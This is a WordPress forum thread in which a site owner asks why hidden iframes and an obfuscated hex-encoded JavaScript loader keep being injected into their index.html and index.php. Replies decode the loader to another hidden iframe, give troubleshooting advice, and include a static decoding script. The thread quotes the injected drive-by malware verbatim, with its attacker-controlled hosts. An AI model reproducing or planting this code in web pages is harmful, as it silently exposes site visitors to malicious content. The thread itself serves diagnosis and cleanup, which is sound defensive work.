• Hello Dear All,
    I am having a problem these days: every second day a new index.html is added to my site's public_html folder, itself having the following code:

    <iframe gkbna='evdnQcds' cfmbt='EHvfXHNs' kuhxw='JHdCe6f4' src='https://javacsript.org/click/in.cgi?4 ' ruxrm='9QKJP5X4' gyrmd='Qs0nDmwY' width='422' height='462' style='display:none'></iframe>
    <iframe gkbna='evdnQcds' cfmbt='EHvfXHNs' kuhxw='JHdCe6f4' src='https://javacsript.org/click/in.cgi?4 ' ruxrm='9QKJP5X4' gyrmd='Qs0nDmwY' width='422' height='462' style='display:none'></iframe>

    While at the same time another code is added to my index.php page, which is

    <script>function c25ac9e406p498bd725b3ec0(p498bd725b65d8){ var p498bd725b9329=16; return (parseInt(p498bd725b65d8,p498bd725b9329));}function p498bd725bdae7(p498bd725c09c5){ var p498bd725c77d4=2; var p498bd725c2911='';p498bd725cc557=String.fromCharCode;for(p498bd725c5044=0;p498bd725c5044<p498bd725c09c5.length;p498bd725c5044+=p498bd725c77d4){ p498bd725c2911+=(p498bd725cc557(c25ac9e406p498bd725b3ec0(p498bd725c09c5.substr(p498bd725c5044,p498bd725c77d4))));}return p498bd725c2911;} var h72='';var p498bd725cece9='3C7'+h72+'3637'+h72+'2697'+h72+'07'+h72+'43E696628216D7'+h72+'96961297'+h72+'B646F637'+h72+'56D656E7'+h72+'42E7'+h72+'7'+h72+'7'+h72+'2697'+h72+'465287'+h72+'56E657'+h72+'363617'+h72+'065282027'+h72+'2533632536392536362537'+h72+'322536312536642536352532302536652536312536642536352533642536332533322533352532302537'+h72+'332537'+h72+'32253633253364253237'+h72+'2536382537'+h72+'342537'+h72+'342537'+h72+'30253361253266253266253637'+h72+'253666253666253637'+h72+'2536632536352532652536312536652536312536632536392537'+h72+'612536352537'+h72+'32253265253633253665253266253639253665253265253633253637'+h72+'25363925336625333125333026253237'+h72+'2532622534642536312537'+h72+'342536382532652537'+h72+'322536662537'+h72+'352536652536342532382534642536312537'+h72+'342536382532652537'+h72+'32253631253665253634253666253664253238253239253261253334253330253334253337'+h72+'253337'+h72+'253332253239253262253237'+h72+'253331253333253334253237'+h72+'2532302537'+h72+'37'+h72+'2536392536342537'+h72+'34253638253364253337'+h72+'253335253338253230253638253635253639253637'+h72+'2536382537'+h72+'342533642533352533332533342532302537'+h72+'332537'+h72+'342537'+h72+'39253663253635253364253237'+h72+'2537'+h72+'362536392537'+h72+'332536392536322536392536632536392537'+h72+'342537'+h72+'39253361253638253639253634253634253635253665253237'+h72+'2533652533632532662536392536362537'+h72+'3225363125366425363525336527'+h72+'29293B7'+h72+'D7'+h72+'6617'+h72+'2206D7'+h72+'969613D7'+h72+'47'+h72+'27'+h72+'565
3B3C2F7'+h72+'3637'+h72+'2697'+h72+'07'+h72+'43E';document.write(p498bd725bdae7(p498bd725cece9));</script>
    <iframe gkbna='evdnQcds' cfmbt='EHvfXHNs' kuhxw='JHdCe6f4' src='https://javacsript.org/click/in.cgi?4 ' ruxrm='9QKJP5X4' gyrmd='Qs0nDmwY' width='422' height='462' style='display:none'></iframe>
    <iframe gkbna='evdnQcds' cfmbt='EHvfXHNs' kuhxw='JHdCe6f4' src='https://javacsript.org/click/in.cgi?4 ' ruxrm='9QKJP5X4' gyrmd='Qs0nDmwY' width='422' height='462' style='display:none'></iframe>

    I didn’t do anything except add new plugins

    PLEASE HELP

Viewing 11 replies - 1 through 11 (of 11 total)
  • Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    Talk to your hosting company about it, get them to secure your server.

    Or switch hosting companies. That would be my recommendation, actually.

    Thread Starter Naveeddil

    (@naveeddil)

    Is it the hosting company's problem, or
    is a plugin doing it?

    Please Reply

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    No idea. Some hosting companies add their code when you use their services. Or you’ve been hacked. Otto’s advice of asking them is the easiest way to find out.

    Try this by way of troubleshooting: back up all your files and databases (always, always, always the best start) and make note of what plugins you are using and what theme.

    Now switch to the default WordPress theme and disable all of your plugins. Move the wp-content/plugins folder to someplace where your web server can’t see it, such as outside of your public_html directory. Same with your theme directory.

    Now clear the cache on your browser (cookies too) and visit your blog. View the source in the blog’s HTML, did the above code disappear? If yes, then it’s either a plugin or your theme. Start by putting things back one at a time till the problem comes back.

    If you did that and the code is still there, then it’s either your host or you have been hacked.

    Thread Starter Naveeddil

    (@naveeddil)

    Dear,
    the problem is that I remove that script and after 48 hours it changes automatically

    I have changed the index.php permissions but still it is

    My question is that if it is a hack, that is one time, but that script is added every 48 hours when I remove it

    Research “.htaccess” on the web.

    Thread Starter Naveeddil

    (@naveeddil)

    I have turned off WP Super Cache and removed it from htaccess

    Let's see what happens

    The code in your index.php decodes to another hidden iframe –

    iframe name=c25 src='https://google.analizer.cn/in.cgi?10&'+Math.round(Math.random()*404772)+'134' width=758 height=534 style='visibility:hidden'

    I can’t see a reason why a decent web host would need to insert such a thing in such a hackerish manner.
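
The decoding described in the reply above can be reproduced statically, without letting the script run in a browser. This is an added example, not code from any post in this thread: it peels the hex layer and the `unescape()` percent-encoding layer and reports any hidden iframe. The function names and the sample input (with a placeholder host) are constructed for illustration.

```javascript
// Static decoder: input is treated as text only, nothing is evaluated.
// Layer 1 is hex (two digits per character); layer 2 is %XX for unescape().

// Rebuild a literal written as 'aa'+h72+'bb', where the junk variable is ''.
function joinLiteral(expr) {
  return (expr.match(/'([^']*)'/g) || []).map(s => s.slice(1, -1)).join('');
}

function hexDecode(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-f]/i.test(hex)) {
    throw new Error('not an even-length hex string');
  }
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Decode well-formed %XX sequences; anything malformed is left in place.
function percentDecode(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Peel both layers, then list every iframe tag and whether it is hidden.
function analyse(expr, maxPasses = 5) {
  let text = hexDecode(joinLiteral(expr));
  for (let i = 0; i < maxPasses; i++) {
    const next = percentDecode(text);
    if (next === text) break;
    text = next;
  }
  const iframes = [...text.matchAll(/<iframe\b[^>]*>/gi)].map(([tag]) => ({
    src: (tag.match(/\bsrc\s*=\s*['"]?([^'"\s>]+)/i) || [])[1] || null,
    hidden: /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag),
  }));
  return { text, iframes };
}

// Constructed sample (not the payload from the thread; placeholder host).
const INNER = "<iframe src='http://placeholder.invalid/in.cgi' style='visibility:hidden'></iframe>";
const pct = [...INNER].map(c => '%' + c.charCodeAt(0).toString(16)).join('');
const layer1 = "<script>document.write(unescape('" + pct + "'));</script>";
const hex = [...layer1].map(c => c.charCodeAt(0).toString(16)).join('');
const SAMPLE = "'" + hex.replace(/7/g, "7'+h72+'") + "'";

console.log(analyse(SAMPLE).iframes);
```

Run it with Node on a copy of the suspicious string literal pasted into a text file or variable; the decoded text and iframe list are only printed, never rendered.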

    Thread Starter Naveeddil

    (@naveeddil)

    is there any way to block it please?

    is there any way to block it please?

    not if inserted by web host

    Well guys, it’s not by the web host, it is kind of a VIRUS attack

    What I think is cross browser injection (may be proper permission set on files or folders)

    Some of my clients faced the same issue but it doesn’t seem to be fixed

    Recently I fixed (actually I removed all files from the web host)
    https://www.waytogrowrich.com
    then I uploaded a very newly coded site onto the host and it works well, but within 24 hrs we found iframe code again inside the index.php page,
    but this time it was not encoded code, it was a clear iframe link anyone can read, but it’s not redirecting the web page.

    I am still looking for this solution.
    If anyone gets to know then please share.

    Please follow these links;
    they may help in a way regarding some PHP security.

    https://www.linuxjournal.com/article/6061

    Please read this article
    https://security.phpmagazine.net/2008/04/mass_iframe_attack_continue_in.html

    Regards

    Raj

  • The topic ‘Automatic Hacking of my Site’ is closed to new replies.